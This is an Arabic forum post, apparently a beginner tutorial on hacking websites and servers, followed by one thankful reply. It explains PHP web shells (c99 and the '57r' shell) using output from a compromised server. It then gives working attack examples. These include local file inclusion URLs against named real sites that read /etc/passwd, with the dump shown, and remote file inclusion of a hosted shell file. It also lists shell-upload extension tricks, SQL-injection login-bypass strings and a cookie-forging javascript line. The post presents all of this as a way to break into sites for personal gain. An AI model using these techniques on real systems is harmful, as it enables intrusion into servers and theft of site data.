تحديث الصفحة مدخل لأختراق المواقع والسيرفرات [ للمبتدئين ]

[cold]

بسم الله الرحمن الرحيم

السلام عليكم ورحمة الله وبركاته ,,,
مدخل إلى إختراق السيرفرات والمواقع

راح نتناول في هذا الدرس معلومات تفيد كل مبتدئ في السيرفرات , واحب اقول للجميع اختراق المواقع والسيرفرات عملية سهله تحتاج للمعرفة,, وحب التعامل
وسوف تجد العمليه منطقيه جدا ,, وسوف يتم التطرق لكل نقطه بشكل موسع والاجابة على الاستفسارات ,

ماهي.. السيرفرات .. وانواعها ...ومبآدى أساسيه تحتاجها في اختراق المواقع والسيرفرات.. الخ



الكل مننا يريد انا يتعلم الهكر ويتعلم اختراق المواقع ولكن للأسف لا يعرف ماهو الفرق بين الموقع وماهو السيرفر والفاهيم التي تعينه على فهم عملية الأختراق ومتابع الدروس والبدأ في المناقشه

سوف نبدأ بتوضيح معنى السيرفر للجميع والشرح راح يكون بلغة مفهومه للجميع وبشكل مبسط بعيد عن المصطلحات العلميه

السيرفر
هو عبارة عن جهاز وتستطيع تشبه بالجهاز االلي جالس عليه لكن يفرق معنا في المواصفات يعني مواصفاته عاليه ليتحمل الضغط ويعمل بكفاءه عاليه
يستضيف عدد من المواقع او موقع واحد

طيب الموقع وش هو عبارة عن ملفات موجوده داخل مجلدات مكتوبه بأحدى لغات البرمجه html, php ,asp,aspx ..الخ

طبعا الموقع يحتاج إلى سيرفر لك يتم تسكين ملفات الموقع عليها لكي يستطيع الجميع في الوصول والاطلاع على الموقع


طبعا الواحد يجي يسال وانا وش دخلني في السيرفر انا ابغا اخترق الموقع وخلاص؟ ,,,

طبعا لمن تجي تخترق الموقع راح يكون اختراقك لي السيرفر لي الوصول لي الموقع ,,, ولابد يكون لديمك معرفه بالسيرفر ونظم التشغيل الي تعمل عليها السيرفرات

هنالك عدة انواع لي نظم التشغيل التي تعمل عليها السيرفرات وهي

1- سيرفرات ويندووز -win2008- win2003-Win2000 واكيد معروف نظام التشغيل لدى الجميع والأغلبية ويندوز هناك نوع من انظمة التشغيل لي ويندوز يتناسب مع عمل السيرفرات
وسوف ترى هناك دروس انك تسطتيع عمل جهازك الشخصي سيرفر على ويندوز xp او vista ,, وانتشاره بشكل كبير ..

2- لينكس Linux .. نظام تشغيل قوي ويعتمد اكثر في ادارات السيرفرات بأعتباره مفتوح المصدر ويوجد عدة توزيعات لها سوف تتطرق لها مع الأيام .

,توجد تقسيمات لي هذه النوعه وانظمه اخرى ,, لم اتطرق لها لان مايهمنا هو النوعان الي تم ذكرها لكثرة التعامل وشعبيتها ,,


مصطلحات ومبأدى إختراق السيرفرات المواقع ,,

*نظام التشغيل والأوامر المستخدمه

طبعا الكل يسأل مالذي يهمنا في نظام التشغيل,في عملية اختراق المواقع والسيرفرات السبب بسيط لان الموقع يكون على سيرفر يعمل على نظام تشغيل وعندما نريد التعامل مع هذه

الأنطمة لأبد ان نعرف الأوامر وطرق التحكم بها في اطار نظام التشغيل الذي يعمل عليه الموقع ,, لو نتخيل انك تريد من احد ان يقوم بعمل شيء معين لديك لابد ان تقوم

بتوجيه هذا الأمر إليه بلغه مفهوم إليه مثلا (( احضر لي كوب من العصير )) لابد ان يوجه السؤال لي شخص يكون ملم بالغله العربيه لانك اذا طرحت السؤال على شخص

لايفهم اللغه العربيه لن يستطيع تنفيذ طلبك كذلك هي الانظمة يجب ان تتعرف على اهم الأوامر المستخدمه ونوع نظام التشغيل وكيف التعامل مع موجه الأوامر سؤال dos ( الدوس )

او غيره في نظم التشغيل سو يتم توضحيها بعون الله .


*الثغرات .

هي عباره عن أخطاء برمجيه يتم استغلال هذه الثغرات في صالح الهكر لي قراءت ملفات على السيرفر او رفع ملفات ( الشل )



*الشل .

هو عبارة هو عبارة ملف مبرمج بلغة برمجيه ,,, يعتبر احد ملفات التجسس الهدف منه تنفيذ الأوامر Command وقراءة معلومات من السيرفر والحصول على أكبر قدر من المعلومات

عن الموقع المستهدف ,, او السيرفر لتمم عملية اختراقه , الان عرفنا الفاده من السيرفر وهي تنفيذ اومر والحصول على المعلومات المهمة ,, وتوجد له عدة انواع ولكل نوع مميزات ولكن

الفاده منه واحده ..


الآن سوف اقوم بشرح الشل ووضع صور له ومعرفة اهم الخصائص . والشل مبرمج بلغة php والمعروف لدى الجميع طبعا راح يدور في بال الجميع سؤال ليه نشرح على php لانه هو المعروف

والمتداول واغلب المواقع مبرمجه بغلة php

والشل الذي سوف نقوم بشرح هو الشل الروسي 57r وراح اشرح كذلك الشل c99 لانه من اغلب الأنواع المستخدمه

اول شيء على 57r وهو شل مطور شوي لكن لا يختلف عن قرينه الاصلي


*الشل الروسي 57r

صورة للشل




سوف نقوم بتوضيح الخضائص والخيارات التي تراها امامك بالتفصيل

القسم العلوي توجد فيه المعلومات العامة

بشرح لكم سطر سطر

20-06-2009 21:17:11 Your IP: [188.52.102.98] Server IP: [216.67.247.87]

هنا يظهر الايبي الخاص بجهازك Your IP: [188.52.102.98] و كذلك الاي بي الخاص بالسيرفرServer IP: [216.67.247.87]

نجي للمعلومات التاليه
PHP version: 4.4.8 cURL: ON MySQL: ON MSSQL: OFF PostgreSQL: OFF Oracle: OFF

PHP version: 4.4.8 نسخة اصدار php للسيرفر كما هو واضح امامك وباقي المعلومات ماتحتاج توظيح الا في وقتها اللي يهمنا اصدار php اكثر شير

Safe_mode: OFF Open_basedir: NONE Safe_mode_exec_dir: NONE Safe_mode_include_dir: NONE
Disabled functions : NONE

Safe_mode: الوضع الأمن ( الحماية ) وهو وضع الحماية في السيرفر اما تكون الحمايه فعاله وا تكون مغلقه اي OFF , ON طبعا في حالة تكون الحمايه OFF لن تواجك اي مصاعب في تنفيذ الأوامر وسوف يكون العمل على الشل بشكل سهل جدا اما اذا اصبح الوضع الأمن مفعل ON سوف تواجهك معوقات في تنفيذ الأومر


Disabled functions
الدوال المعطله في السيرفر وتكون الدوال معطله في كلا حالتي الوضع الامن سوف نتطرق لها بشكل موسع في الدروس الأخرى


Free space : 20.86 GB Total space: 54.08 GB
Useful: gcc,cc,nano,pico,ld,php,perl,python,make,tar,netca t,locate,

الخيارات اللي في الأخير تشوفنها .. عباره عن قراءة ملفات وخدمات من الشل تسهل الوصول إليها وبعض المعلومات مثل مساحة الموقع اللي انت عليه التطبيقات اللي يستخدمها
ماراح اتعمق فيها بشكل كبير وناخذ اللي تحتاجونه


نأتي الأن للجزء الأخر

كود PHP:


uname-a : Linux ireland.directrouter.com 2.6.9-78.0.8.ELsmp #1 SMP Wed Nov 19 20:05:04 EST 2008 i686 i686 i386 GNU/Linux 


ireland.directrouter.com
عنوان السيرفر المستضيف
Linux
نوع نظام التشغيل للسيرفر
2.6.9-78.0.8.ELsmp #1 SMP
اصدار الكرنال ,, لنسخة اللينكس سوف نطرق إليها في الدروس المتقدمة ,,

id

كود PHP:


                        id:uid=99(nobody) gid=99(nobody) groups=99(nobody) 


هنا عرض صلاحياتك في السيرفر ,, وسوف يتم تخصيص دروس مفصله بالصلاحيات ,,

كود PHP:

/home/portugal/public_html/emailer1   ( drwxrwxrwx ) 


هنا مكان عملك في السيرفر وكما تلاحظ التقسيم سوف اقوم بشرحه بشكل تفصيلي وطرح مثال

home
داخل المجلد نجد مجلدات المواقع وكل مجلد موقع يسجل بيوزره الخاص مثلا الشل الذي تم الشرح عليه موجود في اليوزر portugal وهنا عرفنا يوزر الموقع الذي نحن عليه ونستنج من ذلك انا كل موقع له يوزر مخصص له يوجد داخل مجلد home مجلد المواقع الموجوده في السيرفر

public_html

هذا المجلد كل مادخله يعرف على المتصفح ,, اي هو المجلد الرئيسي للموقع مثلا عندما تريد ان يعرف الملف على موقعك نضعه داخل مجلد public_html مثلنا قمنا برفع sniper.php

واردنا ان نستعرضه نذهب إلى الموقع الذي تم رفع الملف عليه واستعراض الملف كالتالي
[]

اي ان كل مايوجد داخل مجلد public_html يتم عرضه في الرئيسة واذا كان داخل مجلد نطلع عليه بوضع مساره

سوف اضرب لك مثال تقريبي على جهازك إذا كان لدينا مجلد اسمه المواقع وداخل هذا المجلد

ثلاث مجلدات xp sniper torabora

اى لدينا ثلاث مواقع موجوده داخل المجلد المواقع لذلك نجد انا المسار للمواقع راح يكون كالتالي

home/******/public_html/ نستبدل النجوم باسم اليوز لك يصبح لدنيا المسار لكل موقع

وبعد ذلك دخلنا على مجلد sniper

وذهبنا للمسار التالي

home/sniper/public_html/imge/

وقمنا برفع صوره group xp.jpg وكنا نريد استعراضها سوف نتجه إلى موقع سنايبر ويصبح رابطنا كالتالي

[] xp.jpg

وليس الشرط ان يكون عنوان المواقع مطابق ليوزر الموقع ولكن كمثال تم الشرح عليه وإن يكون هنالك اختلاف بين اسم الموقع ويوزره .

وكذلك ناخذ في الأعتبار ليس جميع المواقع تحت هذا التقسيم ولكن يختلف التقسيم من سيرفر إلى اخر ولكن اغلب التقسيمات تكون على الشكل التالي وفي الغالب في السيرفرات الموجود فيها خدمات cpanel يكون دائما التقسيم العام في السيرفر على هذا الشكل واتضح كذلك ان لكل موقع مساحه موجوده في مجلد داخل السيرفر .


نستنج من السابق ان الموقع يتكون من جزئين

1- دومين نيم ( اسم الموقع ) domin name
2- مساحة موجوده على سيرفر لرفع ملفات الموقع

ويتم الربط في مابينهما ,, تم توضيح هذه النقطه وسوف ندخل في تفاصيلها بشكل اكبر في شرح طرق سحب الدومين .


شاشة عرض نتائج الأوامر ومربع إدخال الأوامر




تصاريح الملفات والمجلدات

هنالك ثلاثة مستويات لتصاريح الملفات هي
1- القراءة Read
2- الكتابة Write
3-التنفيذ execute

أيضاً هنالك ثلاث مجموعات لإعطاءها هذه التصاريح
1- Owner المالك ( اليوزر )
2- Group مجموعة المستخدم
3- الجميع everyone .

يستخدم الأمر chmod متبوعاً بتلاثة أرقام للتصاريح ، والرقم الأول هو للمالك Owner ، والرقم الثاني للمجموعة Group أما الثالث فهو للجميع Everyone

وهذه ترجمة لمستويات هذه الأرقام والتصاريح :
0= --No permission
1 = --X Execute only
2 = -W- Write only
3 = -WX Write and execute
4 = R-- Read only
5 = R-X Read and execute
6 = RW- Read and write
7 = RWX Read, write and execute


بعض التصاريح المعروفة
604 : أقل تصريح لمفات الـ html
705: أقل تصريح للمجلدات
755 : أقل تصريح للبرامج والاسكربتات
606 : أقل تصريح للمفات المستخدمة من قبل الاسكربتات
703 : تصريح القراءة فقط للـ Public FTP


اي انه اللينكس يتم تحديد التصاريح لي ثلاثة افراد

u: وتعني اليوزر
g: وتعني مجموعة اليوزر
o: تعني آخرون أو أي أحد

والتصاريح تقسم إلى ثلاثة :
r: التصريح بالقرائة
w: التصريح بالكتابة
x: التصريح بالتطبيق في السرفر


التصاريح تكون بهذا الشكل:


u__| _g_|_o_|
| rwx|rwx | rwx


كمثال فتجد التصاريح على الشكل التالي

rwxrwxrwx

باللون أخضر اي انه قابل للكتابة القراءة ويكون رقم التصريح 777

ونستطيع من خلال التصريح معرفة النوع هل هو ملف او مجلد او اختصار من الحرف الأول


مثال:drwxrwxrwx

هذا تصريح مجلد للقراءه والكتابه ولكن كيف عرفنا انه مجلد انا اقول لك لو تلاحظ اول حرف يتغير دائما وهنالك دائما ثلاث احتمالات وهي

d مجلد
- ملف
l إختصار سواء لي ملف او مجلد

ولكن يستأل الجميع لماذا اعرف تصاريح الملفات ,, الأمر سهل لمعرفة الملفات اللي تستطيع قراءتها

مثلا في حالة تكون صلاحياتك (nobody) نوبدي تكون صلاحياتك بالتعديل على الملفات بالشكل التالي ,,
بعد روؤية التصاريح اعلم ان هناك حيرة وصعوبة عند بعض الأشخاص في فهمها ولكن سوف تتضح معك التصاريح بشكل كبير وواضح عند التطبيق والتعمق في صلاحيات المستخدمين في السيرفر ,,
وذلك من خلال الدرس القادم سوف نتطرق صلاحيات كل مجموعه على السيرفر

================================================== ================================================== =

الثغرات - انواعها - وطرق استغلالها

*مقدمة..
نجي لي نقطه مهمة تعلم اختراق السيرفرات ... الكل يحتجها ويجب فهم هذه النقطه بشكل جيد ,, لك تتمكن من رفع الشل والتطبيق .

طبعا كما ذكرا سابقاً أن الثغرات هي عباره عن أخطاء برمجيه يتم استغلاله في صالح الهكر والأستفادة منها اما في رفع شل او تنفيذ أومر وقراءة ملفات على السيرفر ...

هل تعتبر الثغرات هي الوسيلة الوحيدة لرفع الشل ؟

في الغالب تعتبر الثغرات هي الوسلية الوحيدة لي وصولك على السيرفر وضمان رفعك للشل على الموقع المصاب ,, ولكن توجد هناك طرق اخرى سوف يتم التطرق إليها في دروس مفصلة عباره عن طرق الأستفاده والوصل إلى السيرفر ...

*أنواع الثغرات وشرح مبسط عن كل نوع .

هنالك عدة أنواع من الثغرات وهي كالتالي :

1-Remote File Include ( ريموت فايل انكلود )
تعتبر من اخطر أنواع الثغرات حيث يتم بواسطة هذا النوع من الثغرات جلب صفحه إلى ملفات الموقع

ولكن حاليا قل عدد الثغرات المكتشفه من هذا النوع وذلك يعود لي عدة أسباب اصبحت معروفه بشكل كبير ,, وكذلك اغلاق دوال سحب الملفات في php5 لان كان تأتي الدالة allow_url_include = On مفعله تلقائي في الأصدارات القديمه ولكن في الأصدارات نجد أن الداله مغلقه ولاتعمل الا عند تغير الأعدادت والسماح بعمل هذه الداله واغلب السيرفرات تغلقها لخطورتها

سوف نقوم بشرح ثغرات الفايل انكلود وطريقة عملها وذلك لي الأستفادة منها في دروس متقدمة وعملها على بعض السيرفرات ويكون شرحنا شامل لي جميع انواع الثغرات

لدينا مثال :

كود PHP:

www.xxxxx.com/index.php?dmx=http://www.xxxxx.com/sniper.txt?

الموقع الضحيه : كود PHP:

http://www.dz4all.com

الملف المصاب والمتغير : index.php?dmx حيث انا

الملف المصاب هو index.php والمتغير هو dmx

ويجب ان يكون مرفوع على مساحة على الأنترنت ويكون على صيغة ملف txt

كما تلاحظ انه يجيب ان يتم وضع علامة = بعد المتغير ويتم وضع رابط الشل بعد ذلك على صيغة txt وفي الأخير يتم وضع علامة ؟ من دونها لن يعمل الشل

يختصر اسمها كالتالي (r-f-i]


Local File Inclusion Vulnerabilities-2 يرمز لها بـ lif

لوكال فايل انكلود لاتختلف عن .. ريموت فايل انكلود ,, االا بشيء بسيط هو انه الوكال فايل انكلود ثغرة تسمح لنا بقراءة ملفات الموقع وملفات السيرفر الداخليه

كمثال عليها

قراءة يوزرات السيرفر

كود:
http://www.dennismusic.nl/site/showpage.php?tekst=../../../../../../../../../../../../../..//etc/passwd
ولكي يتم حفظ النتائج بشكل مرتب ,, نجد في الأعلى في المتصفح خيارات عديده نختار من شريط القوائم
عرض - المصدر أو ( مصدر الصفحه ) suroce page

حيث النتائج كالتالي

كود:
bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news: uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0perator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin dbus:x:81:81:System message bus:/:/sbin/nologin vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin rpm:x:37:37::/var/lib/rpm:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin netdump:x:34:34:Network Crash Dump user:/var/crash:/bin/bash sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin pcap:x:77:77::/var/arpwatch:/sbin/nologin apache:x:48:48:Apache:/var/www:/sbin/nologin xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin diradmin:x:100:101::/usr/local/directadmin:/bin/bash mysql:x:101:102:MySQL server:/var/lib/mysql:/bin/bash majordomo:x:102:2::/etc/virtual/majordomo:/bin/bash admin:x:500:500::/home/admin:/bin/bash named:x:25:25:Named:/var/named:/sbin/nologin
وهنا قراء لي ملفات الموقع بوضع مسار الملف ولقد طلبنا قراء الملف showpage.php
الموجود على مساحة الموقع في المسار الظاهر لديك عند تنفيذ امر القراءه

كود:
http://www.dennismusic.nl/site/showpage.php?tekst=../../../../../../../../../../../../../..//home/admin/domains/dennismusic.nl/public_html/site/showpage.php
من خلال تحديد مسار الملف في السيرفر وخروج ناتج القراءه في وسط صفحة الموقع






وهكذا للوصول إلى المعومات المهمة في الموقع



================================================== ================================================== =


3- ثغرات رفع الملفات ( رفع الشل ) upload shell

تعبر من اسهل انواع الثغرات حيث تستطيع من خلالها رفع الشل بشكل مباشر على الموقع المصاب بالثغرة او بالاصح موقع يستخدم سكربت مصاب بهذا النوع من الثغرات

حيث يتم رفع الشل بأمتدادت مختلفه shell.php او shell.php5 او shell.php4 او shell.php.jpg

وتوجد عدة امتدادت والسبب في تغير الأمتداد وذلك لي عملية التمويه وقبل رفع الشل حيث يلاحظ الجميع وجود مراكز واغلب الناس ترفع منها شل ولكن نادرا مانجد ثغره في سكربت مصاب وذلك يوضح لنا شي انه ليس كل موقع يوجد به مركز رفع يقبل برفع الشل ,, وحتى لو وجدت ثغره , فأوقات يتم الطبق الثغره ولكن نجد انه لانصل لنفس النتيجه المرجوه وذلك نتيجه لترقيع الثغره الموجوده في السكربت



دائم ثغرات الأبلود بشكل عام يكون استغلالها بشكل بسيط وهي عبارة

عن ملف الرفع المصاب مثلا لدينا سكربت رفع مصاب ومسار الرفع فيه هو

كود PHP:

http://www.xxxxxxh.com/up/upload.php

والذي من خلاله نقوم برفع الشل

والرابط الأخر يوضح لك مسار الشل بعد رفعه في الموقع المصاب إكمال للمثال

كود PHP:

http://www.xxxxxxx.com/up/user/files/shell.php

حيث ان shell.php هو اسم الشل الذي قمت برفعه واحيان قد يتم تغير اسم الملف ولكن الجميل في
ثغرات الرفع ان اغلب الاسكربتات تعطيك مسار الملف المرفوع



4 - ثغرات تخطي الباسورد Bypass

من اسهل انواع الثغرات ولا يحتاج تطبيقها إلى تفكير سوف اقوم بشرحها بشكل مبسط ومفهوم يصل إلى الجميع .. في هذا النوع من الثغرات ,, استغلال الثغرات من خلال دخول لوحات التحكم لي الادارءه
او دخول لوحة تحكم الادمن admin من دون باسورد

كمثال دخول إلى مساحة الأدمن بمجرد وضع المسار والتحكم بالموقع بصلاحيات الأدمن

[]

حيث ان الموقع المصاب هو sniper.com
ومسار لوحة الأدمن هي admin/home/index.php


او الدخول من خلال لوحة التحكم بباسورد تقبله جميع المواقع التي تعتمد على السكربت مثال واكثر باسورد شيوعا ومستخدم في التخطي

' or 1 = 1 --' او 'or' او or 1=1

يتم وضع هذه التعليمات في خيار اليوزر والباسورد والدخول على لوحة التحكم

وكذلك استخدام اكواد الجافا في الدخول إلى لوحة التحكم حيث يتم وضع كود جافا بعد الموقع المصاب

بحيث نضع رابط الموقع المصاب وبعد ذلك استبداله بكود جافا يهدف إلى سرق كوكيز الأدمن ودخل لوحة التحكم

كود:
javascript:document.cookie = "logged =1";
وحسب السكربتات المصابه نستطيع استغلال الثغرات لي مصالحنا الشخصية وحسب الخيارات المتوفره لدنيا في لوحة تحكم الموقع المصاب حيث يوجد في اغلب السكربتات خيار لي رفع الملفات نستطيع استغلاله في اغلب الأحيان لرفع الشل

وسوف يتضح معاك طريقة عمل الثغره في الدروس القادمه ,, وكذلك عند شرح ثغرات sql التي سوف اتكلم عنها بعد قليل .


================================================== ================================================== =


5 - ثغرات XSS --- Cross Site Scripting

ثغرات xss تستخدم في أغلب الأوقات لسرقة كوكيز من جهاز الأدمن عن طريق هذه الثغرات ومن خلال الحصول على الكوكيز نسطتيع دخول الأميل او لوحة تحكم موقع وتعتبر من الثغرات الخطيره
إذا تم استغلالها بشكل جيد




6 - الأستعلام في القواعد sql - SQL Injection

ثغرات سكل إنجكشن او ثغرات حقن القواعد هي من الثغرات الخطيره والمنتشره بشكل كبير في الوقت الحالي حيث نسطتيع من خلال هذه الثغرات تنفيذ اوامر sql وقراءة قواعد البيانات ,, وكذلك نستطيع من خلالها قراءة ملفات الموقع ,, وحتى رفع الملفات عن طريق هذا النوع من الثغرات .

وسوف يتم الطرق إلى هذا النوع من الثغرات بشكل موسع ومواضيع مفصله له لتشعبه واهميته وكثرة ثغراته في الوقت الحالي وكذلك سهولة عملية الأختراق بهذه الثغرات

================================================== ================================================== =

بعد ماتعرفنا على انواع الثغرات المستخدمه وتوضيح طرق استغلالها اصبحت لدينا خلفيه الان ونستطيع فهم المصطلحات عندما يقول احد الأشخاص ثغرة ابلود ,, او ثغرة فايل انكلود ,, ولو تدقق وتلاحظ جميع الثغرات يتم استغلالها للوصول إلى مساحه على الموقع او قراءة الملفات المهمة للموقع عن طريق ثغرات وذلك لجمع المعلومات المهمة التي تساعدنا في اختراق الموقع ,,

والسلام عليكم

[S4wDz]

مشكور اخي الحبيب وبارك الله فيك لم اكن اعرف اكثر هده الامور جعله الله في ميزان حسناتك تحياتي لك